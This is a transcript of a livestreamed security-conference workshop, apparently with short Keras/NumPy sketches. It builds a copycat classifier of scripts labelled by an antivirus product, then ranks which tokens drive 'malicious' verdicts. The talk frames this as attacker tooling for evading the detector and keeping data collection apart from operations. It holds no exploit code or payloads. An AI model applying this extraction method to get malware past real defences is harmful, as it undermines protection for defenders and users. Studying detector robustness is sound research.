I like this next bit; it's part of my playlist of holy wars: tabs versus spaces, nano versus VS Code, Messi versus that other guy. Machine learning frameworks are no different. Do you guys have preferences for machine learning frameworks, and why do you choose the one you do? "I use PyTorch because it tends to look more like real code than TensorFlow. But Keras is super easy to get up and running, so it's a good choice. And when I do real-world stuff, I reach into a compiled language like Rust or C." Oh, see, that's brave. Has anybody used ML.NET? Did anybody know ML.NET existed? "Depends on what you want to do. There's actually a Win32 machine learning implementation, in DirectX, though it's really just an interface for TensorFlow and ONNX models." I prefer Keras; it's simple. If all the math is the same, you're really just choosing what you prefer. "Keras is good to get off the ground, but it may limit your customization." And I think that's exactly what an API does: it doesn't limit you, it abstracts complexity. The reason Keras is so easy to use is that it does a really good job of abstracting complexity, but if you want that complexity, if you want to dig in, it's still there for you; you just have to dig a little deeper. Versus something like PyTorch, which is pretty raw, I would say. That's probably not true. Some guy in the back is yelling about MATLAB right now. "MATLAB? That's a whole other thing; we all have a little bit of PTSD about it." Yeah, don't ever say MATLAB.
Rich is saying Keras is good for 99% of your projects and PyTorch for when you're getting freaky; I'd say PyTorch is good for 90% of your projects and Rust for when you're getting freaky. There's also JAX, all sorts of stuff. Oh yeah, JAX. Does anybody use JAX? Do they like it? I know Jason's in here. It's kind of the Wild West, I would say: there are a bajillion different frameworks and everybody uses something different. I like TensorFlow. It has TensorFlow Serving, and it seems to have a good ecosystem around it. You obviously make trade-offs, but if your vocabulary and your fundamentals are good, you could probably use just about any framework with enough practice.

Okay, so we're going to create our model now, effectively the same as the picture, but in code. One thing we didn't talk about is activation functions. Actually, there's a lot I didn't talk about. As your data traverses from inputs through weights into hidden layers and hidden nodes, the weights' job, as they change, is to modulate the inputs such that the output is relative to them. Sorry, I saw something in the chat. We're just going to use sigmoid; I think sigmoid is a super simple place to start. What are some other favorites? I know ReLU has replaced sigmoid. Is there a good reason for that, or does everybody just go, "oh, this is better, so I'll use it all the time now"? "The ReLU paper basically said ReLU gets better accuracy than sigmoid, and compared that across a bunch of tasks. On images, ReLU tends to score higher than sigmoid, and that's basically why it won: on images you can easily show it's better. I don't know whether it's concretely better in all situations. You're showing your age with sigmoid here." "ReLU also handles the disappearing differential, the vanishing gradient, where if you go too far into the negatives or too far into the positives, you're never going to crawl yourself back out. Then there's leaky ReLU, which tries to help with that even more, and ELU, which says, hey, you could be ReLU or leaky ReLU, let's combine the two; I think it never goes below negative one." Yeah. And I actually like this discussion. I don't know how many of you listening are machine learning people to begin with, but this is why the tutorials are limiting: they're nice for getting off the ground, but they always use the same architectures, and they never say "this is good for this, and that is good for that." You might end up there anyway; maybe they've just learned lessons you haven't. But I think it's important to explore different architectures and different losses, to just play with the numbers. Machine learning is ultimately about iteration and experimentation at scale, and that includes activation functions, output nodes, any lever you can pull: pull it and see what happens.
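Since we just compared them, here is a hedged NumPy sketch of the activations mentioned, written out by hand:

```python
# Hedged sketch of the activation functions discussed above.
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))        # squashes to (0, 1); saturates at the tails

def relu(x):
    return np.maximum(0.0, x)              # zero for negatives, identity for positives

def leaky_relu(x, alpha=0.01):
    return np.where(x > 0, x, alpha * x)   # small negative slope instead of a dead zero

def elu(x, alpha=1.0):
    return np.where(x > 0, x, alpha * (np.exp(x) - 1.0))  # smooth, bounded below by -alpha

x = np.array([-4.0, -1.0, 0.0, 1.0, 4.0])
for fn in (sigmoid, relu, leaky_relu, elu):
    print(fn.__name__.ljust(10), fn(x).round(3))
```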
Also, as an engineer, or as a data scientist, you should learn to pull the levers and see what happens, because you might find that on, say, security data, sigmoid works better than ReLU in a given case, and if you never tried sigmoid because you always go with the standard ReLU, you'd never learn that. So read everything, try everything. Hang out at AI Village; super smart people. Hang out at Journal Club and be a little flounder; that's what I do.

Okay, so we've created our model. One thing we need to do is feed our documents, our vectors, into the model. When I was first starting, this was actually one of the harder pieces to fit in my brain, and I think that's common: the shape of arrays and how they get introduced into models. Does anyone in the chat want to take a stab at what these three question marks should be? Live, now. "I'm hung up on the missing parentheses." But Rich got it: the feature size. Yeah, exactly. And what is that? Pretty sure it's your matrix.shape value. (What's tripping you up? You're probably missing some imports; I'll push the new version. If you're missing those imports, you'll want to pull again.)

So we created our model, and it's super simple. The input_dim we're feeding it is the width of the text matrix, an array of, let's see, probably around 86,000 tokens. Across this, it's going to look like roughly 1,200 samples, each about 80,000 tokens long, and we just feed that in. Nice.

Then we do a train/test split. When you build a model, you have test data, and you want to hold some of it out. The idea is that eventually your model will be deployed into the real world, where it won't be seeing its training data. So you keep some data out of your training set, and when the model sees data it hasn't seen before, it can hopefully make an accurate guess. That's why we split.

I've heard you guys talk about leaking into your training data during training. How does that happen? "One way: duplicate samples. Normally you pick a random set of indices, or the last 20% of your indices, as your test set, or you do a cross-validation fold where you divide the data up somehow. If you had duplicate data, say the last 20% of your data was duplicated in the first 20%, you train on the first four folds and test on the last one; since it's duplicated, it's included in your training set, and you do really well. You have to make sure you don't have that sort of issue. A lot of the time it's basically a data-cleaning issue, and sometimes it's a weird bug in your code. Sometimes you can just invert the model itself: you say, show me what this looks like, and it prints out an example from the training set." Nice. Okay.
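Here is a hedged sketch of that model plus the hold-out split, assuming the text_matrix and score_matrix arrays from the earlier sketch; the layer sizes are illustrative.

```python
# Hedged sketch of the copycat model and the train/test split described above.
from sklearn.model_selection import train_test_split
from tensorflow.keras.layers import Dense
from tensorflow.keras.models import Sequential

X_train, X_test, y_train, y_test = train_test_split(
    text_matrix, score_matrix, test_size=0.2, random_state=42)  # hold 20% out

model = Sequential([
    Dense(32, activation="sigmoid", input_dim=text_matrix.shape[1]),  # the "???": feature size
    Dense(1, activation="sigmoid"),    # single output node: P(malicious)
])
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
model.summary()
```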
Okay, so: early stopping. Early stopping is super nice. If you have a really long-running task and your model stops improving, early stopping will just end the training. Part of me doesn't like it, because I feel like it could always get a little better, but this is a tiny model, so we're not that invested; we don't really mind. Keras also gives you callbacks, so you can hook in TensorBoard or whatever. Batch size is the frequency at which updates to the weights happen. Epochs is just the number of times we run through the training data. So we can train, and it already seems pretty accurate; I haven't actually tried to optimize this at all. But what do you do when a model trains really accurately right away? Do you think it's beneficial to try to overfit a model at first, since that would at least indicate it can learn something? "Rich and I both get very paranoid when the thing does too well." Yeah. Accuracy of 100%? Something's wrong. Something must be wrong, and it could be any number of things. This is version one, and I'm giving you the code so you can recreate the model and do whatever you need to. I would love to see a blog post or a write-up about everything I missed.

This is a visualization of training loss. With gradient descent you'd like to see it going down. If it were inverted, that could indicate a number of things: either it's not learning, or it's overfitting and has stopped learning entirely. Then there are some evaluation metrics, and obviously it's going to say it did really well, as we saw up here, so it's a little suspect. Even after you have a model, I like to pull out a couple of the best and worst examples of a category. We put them in a list such that the malicious ones come first and then the non-malicious, so we take the second malicious document and the last non-malicious document, predict both, and see what they are. They're a little too accurate for my liking. But that's kind of it.

Okay, so this is where we leave you. This Excel file you're looking at here: when I ran it on all 380,000 scripts it took 17 hours, and that will depend on whatever kind of potato you're running. We're probably going to run it here; you might already be running it, and resetting a few times because you thought your thing froze. Effectively what we're doing is toggling absolutely every possible token, making a base prediction and then a new prediction, and keeping a cumulative sum of the differences. What you end up with is a spread of scores across a number of predictions that sorts your tokens into malicious and non-malicious. This is the same idea as the Proofpoint research; the Proofpoint case was easier in this regard because they had a range of scores, 1 to 999, where ours are hard labels, a zero or a one.
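Here is a hedged sketch of that toggling loop; the exact scheme in collect.py may differ, and this version assumes the model, text_matrix, and tokenizer from the earlier sketches. Zeroing one vocabulary column at a time and re-predicting is what makes the full 380,000-script run take hours.

```python
# Hedged sketch of the token-toggling insight extraction: flip each vocabulary
# column off, re-predict, and accumulate how much the scores move.
import numpy as np

base = model.predict(text_matrix, verbose=0).ravel()      # baseline predictions
influence = np.zeros(text_matrix.shape[1])

for col in range(1, text_matrix.shape[1]):                # column 0 is reserved
    flipped = text_matrix.copy()
    flipped[:, col] = 0                                    # toggle this token off everywhere
    new = model.predict(flipped, verbose=0).ravel()
    influence[col] = np.sum(base - new)                    # cumulative score drop

index_word = {v: k for k, v in tokenizer.word_index.items()}
ranked = np.argsort(influence)[::-1]                       # most "malicious" tokens first
for col in ranked[:20]:
    print(index_word.get(col, "?"), round(float(influence[col]), 4))
```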
As a first run-through, looking at the most malicious and the least malicious tokens without any optimization: if this were ever going to work, I'd expect to see the tokens being sorted at least to some degree, because then you can go back and start tweaking the model, or whatever it might be, to really hone in on what's accurate. A lot of the time, for attackers, this first version would be just fine. But going forward, you could always be collecting data. Actually, after my first BSides talk about machine learning last year, Rob came up to me and said: you should have a separate data-gathering campaign, so you keep your ops and your data collection separate, but your data collection can still support your ops. That way it doesn't necessarily burn you, because collecting data can be noisy. So do it a bit at a time, over time.

Do you have any questions or comments? What I would love to see is someone take this Defender model and absolutely crush it. I mean, it's a tiny model; I'm not sure Microsoft would care that much. And there's this VBA data set I haven't touched, so if you want to race on it, I'd love to see what comes out of it. I appreciate everybody; thanks for coming. Hit us up in that Slack, not Slack, Discord, if you have any questions, or if you just want to rag on my terrible code, that's fine too. I'll end it there.

All right, I think this is the last stream of the night, so we're closing out the Twitch stream now. Tomorrow will hopefully go smoother; we learned some things today. I'll see you all in the morning. Hopefully.